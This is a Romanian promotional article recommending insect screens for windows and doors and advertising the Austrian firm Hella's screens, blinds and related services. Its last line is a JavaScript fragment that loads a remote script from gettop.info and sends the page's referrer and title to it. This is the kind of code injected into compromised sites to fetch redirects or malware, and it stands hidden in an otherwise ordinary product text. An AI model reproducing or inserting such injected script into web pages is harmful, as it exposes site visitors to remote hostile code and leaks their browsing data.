1cf75c630ec8983acad04b9bdedad798Odata cu sezonul cald incep sa-si faca simtita prezenta si  insectele, care de cele mai multe invadeaza orice camin, fiind raspunzatoare de disconfort. Cei care vor sa le tina cat mai departe, aplica diverse metode costisitoare si inutile, incepand cu spray-uri, pastile, diferite aparate si terminand cu metode improvizate. Rezultatul: efort ineficient. Cu toate acestea insa, exista alternative care nu numai ca puncteaza la capitolul utilitate ci si la capitolul estetic. Pe scurt, plasele impotriva insectelor, montate la usi sau la ferestre, raman o metoda eficienta, cu rezultate intr-adevar vizibile.

Pentru nopti linistite de vara, lipsite de prezenta iritanta a tantarilor, iti recomandam plasele impotriva insectelor, cele care iti asigura confortul dorit. Asigura o ventilatie excelenta, sunt usor de montat si de curatat, rezistente si bineinteles 100% eficiente. Mai mult decat atat, acestea sunt accesorii moderne, cu un design placut, ce se adapteaza usor oricarui stil de amenajare. Odata ce ti-ai indreptat atentia spre acest produs, poti alege materialul, culoarea, grosimea, tehnica de vopsire, metoda de prindere a plasei pe rama, metoda de prindere a ramei pe tamplaria geamului ori a usii, cat si sistemul de montare, totul datorita ofertei difersificate de modele.

Considerata o bariera de protectie, plasele aniti-insescte permit o vizibilitate buna datorita faptului ca sunt transparente si au ochiurile fine. Altfel spus, plasele de tantari nu obtureaza privelistea si totodata asigura un aspect estetic elegant. Plasele au, de asemenea, avantajul ca se monteaza usor, iar demontarea este la fel de simpla. In plus, montarea lor nu necesita modificarea ramei ferestrei, formand impreuna cu tamplaria un tot unitar. Sunt fiabile, rezistente la frig si caldura, stabile, rezistente la rupere, si nu in ultimul rand, permit aerisirea incaperii, oprind insectele.

Hella, companie cu traditie, activa pe piata sistemelor de protectie solara inca din anul 1959, cu sediul central in Austria, este unul dintre liderii acestui domeniu la nivel European, motiv pentru care, aceasta trebuie sa se afle in topul listei tale, atunci cand vine vorba de achizitionarea de plase impotriva insectelor. Astfel, ai oportunitatea sa alegi dintr-o gama vasta de modele, cu diferite sisteme de fixare, fie cu ajutorul chederului de rulare, fie cu ajutorul imbinarii cu cleme. Plasele anti-tantari se pot instala atat la ferestre cat si la usile de la balcon, terase sau cele din termopan. Sunt produse ce se remarca datorita durabilitatii lor, dar si a designului realizat din tesatura din fibra de sticla, disponibile pe alb, gri si negru. Pe lista de avantaje trebuie inslus si faptul ca pretul de achizitie al acestor plase, indiferent de model, este unul accesibil.

Din portofoliul de produse Hella, se regasesc produse pentru umbrirea locuintei si protectia impotriva frigului si a zgomotului, rulouri exterioare aplicate si suprapuse, rulouri cu plase contra insectelor integrate, sisteme de usi pliante, sisteme de protectie contra insectelor pentru luminatoare de demisol. Pentru ca serviciile noastre sa fie complete oferim consiliere de specialitate, service si montajul produselor, totul la preturi competitive. Hella nu ofera numai produse certificate ci si solutii optime pentru confortul confortul caminului tau. Informatii si detalii suplimentare despre intreaga lista de produse si serviciile pe care le punem la dispozitia clientilor, gasesti accesand pagina noastra de internet.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;